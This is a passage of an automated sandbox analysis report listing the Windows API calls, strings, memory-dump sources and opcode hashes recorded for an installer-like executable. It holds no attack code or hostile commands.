                                                                                                                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                  • String ID: Times New Roman
                                                                                                                                                  • API String ID: 3808545654-927190056
                                                                                                                                                  • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                                  • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                                  • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                                  • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                                  APIs
                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                                  • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                                  • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                                  • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3579998418-0
                                                                                                                                                  • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                                  • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                                                  • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                                  • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 100024E1
                                                                                                                                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                                    • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,7556FFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2435812281-0
                                                                                                                                                  • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                                  • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                                                  • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                                  • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGlobal$lstrcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 176019282-0
                                                                                                                                                  • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                                  • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                                  • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                                  • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                                  • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                                  • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                                                  • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                  • Opcode ID: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                                  • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                                  • Opcode Fuzzy Hash: d593e7263c37e61c996d4e257660d94f001a2630b08086f07ab1fbfa1127a49e
                                                                                                                                                  • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                                  • wsprintfW.USER32 ref: 00404A12
                                                                                                                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                  • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                                  • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                                  • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                                  • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                  • String ID: !
                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                  • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                                  • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                                  • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                                  • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 0040593B
                                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00405945
                                                                                                                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 2659869361-4083868402
                                                                                                                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                                  • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                                                                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                                                                  • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1404258612-0
                                                                                                                                                  • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                                  • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                                  • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                                  • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,004037F6,75573420,00403621,?), ref: 00403839
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                  • API String ID: 1100898210-4083868402
                                                                                                                                                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                                  • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                                  • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405987
